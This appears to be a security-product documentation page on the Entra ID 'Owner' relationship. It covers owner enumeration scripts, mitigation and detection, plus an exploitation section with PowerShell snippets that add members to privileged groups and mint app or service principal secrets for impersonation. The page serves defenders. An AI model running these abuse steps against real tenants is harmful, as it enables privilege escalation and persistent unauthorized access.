AZ_OWNER

Summary

FSProtect ACL Alias

AZ_OWNER

Entra ID (Azure AD) Alias

Owner

Affected Object Types

Groups, Applications, Service Principals, Devices

Exploitation Certainty

Certain

Graph Permission / Role

Object-level owner assignment via Group Owners, Application Owners, or Service Principal Owners

Description

AZ_OWNER represents the ownership relationship in Microsoft Entra ID (Azure AD) where a principal (user or service principal) has been designated as an Owner of an object. Ownership in Entra ID grants significant privileges depending on the object type:

Group Owner: Can add/remove members, modify group properties, and manage group settings. For role-assignable groups, this allows privilege escalation by adding members who inherit directory roles.
Application Owner: Can modify application configurations, add credentials (secrets/certificates), change redirect URIs, and manage API permissions. This can lead to credential theft and unauthorized access.
Service Principal Owner: Can modify the service principal configuration, add credentials, and change authentication settings. Compromising this can allow impersonation of the application.
Device Owner: Can manage device properties and settings.

Ownership is a critical control point that attackers target for privilege escalation and persistence.

Identification

PowerShell

Get Group Owners (PowerShell)

Connect-AzAccount

$groups = Get-AzADGroup
$results = @()

foreach ($group in $groups) {
    $owners = Get-AzADGroupOwner -GroupId $group.Id
    foreach ($owner in $owners) {
        $odataType = $owner.AdditionalProperties['@odata.type']
        $ownerType = if ($odataType) { ($odataType -replace '^#microsoft\.graph\.', '') } else { 'Unknown' }
        $results += [PSCustomObject]@{
            ObjectType       = "Group"
            ObjectName       = $group.DisplayName
            ObjectId         = $group.Id
            OwnerName        = $owner.DisplayName
            OwnerType        = $ownerType
            OwnerId          = $owner.Id
        }
    }
}

$results | Export-Csv -Path ".\AzureGroupOwners.csv" -NoTypeInformation -Encoding UTF8
$results | Format-Table -AutoSize

Get Application Owners (PowerShell)

Connect-AzAccount

$results = @()

# Use Invoke-AzRestMethod to call Microsoft Graph API with owner expansion
$uri = "https://graph.microsoft.com/v1.0/applications?`$expand=owners"

# Handle pagination
while ($uri) {
    $response = Invoke-AzRestMethod -Uri $uri -Method GET
    $data = $response.Content | ConvertFrom-Json
    
    foreach ($app in $data.value) {
        foreach ($owner in $app.owners) {
            $ownerType = if ($owner.'@odata.type') { ($owner.'@odata.type' -replace '^#microsoft\.graph\.', '') } else { 'Unknown' }
            $results += [PSCustomObject]@{
                ObjectType       = "Application"
                ObjectName       = $app.displayName
                ObjectId         = $app.id
                AppId            = $app.appId
                OwnerName        = $owner.displayName
                OwnerType        = $ownerType
                OwnerId          = $owner.id
            }
        }
    }
    
    $uri = $data.'@odata.nextLink'
}

$results | Export-Csv -Path ".\AzureAppOwners.csv" -NoTypeInformation -Encoding UTF8
$results | Format-Table -AutoSize

Get Service Principal Owners (PowerShell)

Connect-AzAccount

$results = @()

# Use Invoke-AzRestMethod to call Microsoft Graph API with owner expansion
$uri = "https://graph.microsoft.com/v1.0/servicePrincipals?`$expand=owners"

# Handle pagination
while ($uri) {
    $response = Invoke-AzRestMethod -Uri $uri -Method GET
    $data = $response.Content | ConvertFrom-Json
    
    foreach ($sp in $data.value) {
        foreach ($owner in $sp.owners) {
            $ownerType = if ($owner.'@odata.type') { ($owner.'@odata.type' -replace '^#microsoft\.graph\.', '') } else { 'Unknown' }
            $results += [PSCustomObject]@{
                ObjectType       = "ServicePrincipal"
                ObjectName       = $sp.displayName
                ObjectId         = $sp.id
                AppId            = $sp.appId
                OwnerName        = $owner.displayName
                OwnerType        = $ownerType
                OwnerId          = $owner.id
            }
        }
    }
    
    $uri = $data.'@odata.nextLink'
}

$results | Export-Csv -Path ".\AzureSPOwners.csv" -NoTypeInformation -Encoding UTF8
$results | Format-Table -AutoSize

Get Device Owners (PowerShell)

Connect-AzAccount

$results = @()

# Use Invoke-AzRestMethod to call Microsoft Graph API for devices with registered owners
$uri = "https://graph.microsoft.com/v1.0/devices?`$expand=registeredOwners"

# Handle pagination
while ($uri) {
    $response = Invoke-AzRestMethod -Uri $uri -Method GET
    $data = $response.Content | ConvertFrom-Json
    
    foreach ($device in $data.value) {
        foreach ($owner in $device.registeredOwners) {
            $ownerType = if ($owner.'@odata.type') { ($owner.'@odata.type' -replace '^#microsoft\.graph\.', '') } else { 'Unknown' }
            $results += [PSCustomObject]@{
                ObjectType       = "Device"
                ObjectName       = $device.displayName
                ObjectId         = $device.id
                DeviceId         = $device.deviceId
                OwnerName        = $owner.displayName
                OwnerType        = $ownerType
                OwnerId          = $owner.id
            }
        }
    }
    
    $uri = $data.'@odata.nextLink'
}

$results | Export-Csv -Path ".\AzureDeviceOwners.csv" -NoTypeInformation -Encoding UTF8
$results | Format-Table -AutoSize

Comprehensive Owner Enumeration (PowerShell)

Connect-AzAccount

function Get-AllAzureOwnership {
    $allOwnership = @()
    
    # Groups (using Az.Resources)
    $groups = Get-AzADGroup
    foreach ($g in $groups) {
        $owners = Get-AzADGroupOwner -GroupId $g.Id -ErrorAction SilentlyContinue
        foreach ($o in $owners) {
            $odataType = $o.AdditionalProperties['@odata.type']
            $ownerType = if ($odataType) { ($odataType -replace '^#microsoft\.graph\.', '') } else { 'Unknown' }
            $allOwnership += [PSCustomObject]@{
                TargetType  = "Group"
                TargetName  = $g.DisplayName
                TargetId    = $g.Id
                OwnerName   = $o.DisplayName
                OwnerType   = $ownerType
                OwnerId     = $o.Id
            }
        }
    }
    
    # Applications (using Invoke-AzRestMethod)
    $uri = "https://graph.microsoft.com/v1.0/applications?`$expand=owners"
    while ($uri) {
        $response = Invoke-AzRestMethod -Uri $uri -Method GET
        $data = $response.Content | ConvertFrom-Json
        foreach ($a in $data.value) {
            foreach ($o in $a.owners) {
                $ownerType = if ($o.'@odata.type') { ($o.'@odata.type' -replace '^#microsoft\.graph\.', '') } else { 'Unknown' }
                $allOwnership += [PSCustomObject]@{
                    TargetType  = "Application"
                    TargetName  = $a.displayName
                    TargetId    = $a.id
                    OwnerName   = $o.displayName
                    OwnerType   = $ownerType
                    OwnerId     = $o.id
                }
            }
        }
        $uri = $data.'@odata.nextLink'
    }
    
    # Service Principals (using Invoke-AzRestMethod)
    $uri = "https://graph.microsoft.com/v1.0/servicePrincipals?`$expand=owners"
    while ($uri) {
        $response = Invoke-AzRestMethod -Uri $uri -Method GET
        $data = $response.Content | ConvertFrom-Json
        foreach ($s in $data.value) {
            foreach ($o in $s.owners) {
                $ownerType = if ($o.'@odata.type') { ($o.'@odata.type' -replace '^#microsoft\.graph\.', '') } else { 'Unknown' }
                $allOwnership += [PSCustomObject]@{
                    TargetType  = "ServicePrincipal"
                    TargetName  = $s.displayName
                    TargetId    = $s.id
                    OwnerName   = $o.displayName
                    OwnerType   = $ownerType
                    OwnerId     = $o.id
                }
            }
        }
        $uri = $data.'@odata.nextLink'
    }
    
    # Devices (using Invoke-AzRestMethod)
    $uri = "https://graph.microsoft.com/v1.0/devices?`$expand=registeredOwners"
    while ($uri) {
        $response = Invoke-AzRestMethod -Uri $uri -Method GET
        $data = $response.Content | ConvertFrom-Json
        foreach ($d in $data.value) {
            foreach ($o in $d.registeredOwners) {
                $ownerType = if ($o.'@odata.type') { ($o.'@odata.type' -replace '^#microsoft\.graph\.', '') } else { 'Unknown' }
                $allOwnership += [PSCustomObject]@{
                    TargetType  = "Device"
                    TargetName  = $d.displayName
                    TargetId    = $d.id
                    OwnerName   = $o.displayName
                    OwnerType   = $ownerType
                    OwnerId     = $o.id
                }
            }
        }
        $uri = $data.'@odata.nextLink'
    }
    
    $allOwnership
}

$ownership = Get-AllAzureOwnership
$ownership | Export-Csv -Path ".\AllAzureOwnership.csv" -NoTypeInformation -Encoding UTF8
$ownership | Sort-Object TargetType, TargetName | Format-Table -AutoSize

Azure CLI

Azure CLI - List owners of a group

az ad group owner list --group "<GroupObjectIdOrName>" --query "[].{displayName:displayName,id:id}"

Azure CLI - List owners of an application

az ad app owner list --id "<AppObjectIdOrAppId>" --query "[].{displayName:displayName,id:id}"

Azure CLI - List owners of a service principal

az ad sp owner list --id "<SPObjectIdOrAppId>" --query "[].{displayName:displayName,id:id}"

Azure CLI - List registered owners of a device (Graph API)

az rest --method GET --url "https://graph.microsoft.com/v1.0/devices/<DeviceObjectId>/registeredOwners" --query "value[].{displayName:displayName,id:id}"

Azure GUI

Group Owners

Open Microsoft Entra admin center -> Groups -> select the target group.
Go to Owners in the left menu.

Application Owners

Open Microsoft Entra admin center -> Applications -> App registrations -> select the target app.
Go to Owners in the left menu.

Service Principal Owners

Open Microsoft Entra admin center -> Applications -> Enterprise applications -> select the target app.
Go to Owners in the left menu.

Device Owners

Open Microsoft Entra admin center -> Devices -> All devices -> select the target device.
Go to Registered owners in the device details.

Exploitation

Group Owner Exploitation

As a Group Owner, add yourself or a controlled identity to gain the group's privileges:

Add user to group (PowerShell)

Connect-AzAccount

# As group owner, add a user to the group
$group = Get-AzADGroup -DisplayName 'Target Privileged Group'
$userToAdd = Get-AzADUser -UserPrincipalName "[email protected]"

Add-AzADGroupMember -TargetGroupObjectId $group.Id -MemberObjectId $userToAdd.Id

Application Owner Exploitation

As an Application Owner, add credentials to impersonate the application:

Add app secret (PowerShell)

Connect-AzAccount

# As app owner, add a new secret
$app = Get-AzADApplication -DisplayName 'Target App'

$passwordCred = New-AzADAppCredential -ObjectId $app.Id -EndDate (Get-Date).AddYears(2)

Write-Host "New Secret: $($passwordCred.SecretText)"
Write-Host "App ID: $($app.AppId)"

# Now authenticate as the application
$securePassword = ConvertTo-SecureString $passwordCred.SecretText -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential($app.AppId, $securePassword)

Connect-AzAccount -TenantId "<TenantId>" -Credential $credential -ServicePrincipal

Service Principal Owner Exploitation

As a Service Principal Owner, add credentials to impersonate the service principal:

Add SP secret (PowerShell)

Connect-AzAccount

# As service principal owner, add a new secret
$sp = Get-AzADServicePrincipal -DisplayName 'Target Service Principal'

$passwordCred = New-AzADSpCredential -ObjectId $sp.Id -EndDate (Get-Date).AddYears(2)

Write-Host "New Secret: $($passwordCred.SecretText)"
Write-Host "App ID: $($sp.AppId)"

# Now authenticate as the service principal
$securePassword = ConvertTo-SecureString $passwordCred.SecretText -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential($sp.AppId, $securePassword)

Connect-AzAccount -TenantId "<TenantId>" -Credential $credential -ServicePrincipal

Device Owner Exploitation

Device ownership has limited direct exploitation potential. As a Device Owner, you can:

Modify device properties and extension attributes
Enable/disable the device
Manage BitLocker recovery keys (if applicable)

Disable device (PowerShell/Graph)

Connect-AzAccount

# As device owner, disable a device
$deviceId = "<DeviceObjectId>"

# Update device properties using Graph API
$body = @{
    accountEnabled = $false
} | ConvertTo-Json

Invoke-AzRestMethod -Uri "https://graph.microsoft.com/v1.0/devices/$deviceId" -Method PATCH -Payload $body

Note: Device ownership is more relevant for Intune-managed devices where additional management capabilities may be available.

Mitigation

Minimize the number of owners for sensitive objects (groups, applications, service principals).
- Go to Microsoft Entra ID -> Groups / App registrations / Enterprise applications.
- Select the object -> Owners -> remove unnecessary owners.
Use Privileged Identity Management (PIM) for just-in-time owner access to sensitive objects.
Monitor owner assignments and alert on unexpected changes.
Avoid assigning ownership to regular users for applications that have sensitive permissions.
Implement Access Reviews for application and group owners:
- Go to Identity Governance -> Access Reviews -> New access review.
- Select the target and configure owner reviews.

Detection

Detect ownership changes in Audit logs.

Go to Microsoft Entra ID -> Audit logs.
Filter by activities:
- Add owner to group
- Remove owner from group
- Add owner to application
- Remove owner from application
- Add owner to service principal
- Remove owner from service principal

Monitor for suspicious patterns:

Owner additions to role-assignable groups.
Owner additions to applications with privileged API permissions.
Credential additions to applications shortly after owner assignment.
Ownership changes outside of change management windows.

References

https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/groups-concept
https://learn.microsoft.com/en-us/powershell/module/az.resources/get-azadgroupowner
https://learn.microsoft.com/en-us/powershell/module/az.resources/get-azadapplication
https://learn.microsoft.com/en-us/powershell/module/az.resources/get-azadserviceprincipal
https://learn.microsoft.com/en-us/powershell/module/az.resources/new-azadappcredential
https://learn.microsoft.com/en-us/powershell/module/az.resources/add-azadgroupmember
https://learn.microsoft.com/en-us/cli/azure/ad/group/owner
https://learn.microsoft.com/en-us/cli/azure/ad/app/owner
https://posts.specterops.io/azure-privilege-escalation-via-azure-api-permissions-abuse-74aee1006f48

PreviousAZ_MG_SERVICEPRINCIPALENDPOINT_READWRITE_ALL NextAZ_PARENT_AU

Last updated 6 days ago

Was this helpful?

hashtagSummary

hashtagDescription

hashtagIdentification

hashtagPowerShell

hashtagAzure CLI

hashtagAzure GUI

hashtagGroup Owners

hashtagApplication Owners

hashtagService Principal Owners

hashtagDevice Owners

hashtagExploitation

hashtagGroup Owner Exploitation

hashtagApplication Owner Exploitation

hashtagService Principal Owner Exploitation

hashtagDevice Owner Exploitation

hashtagMitigation

hashtagDetection

hashtagReferences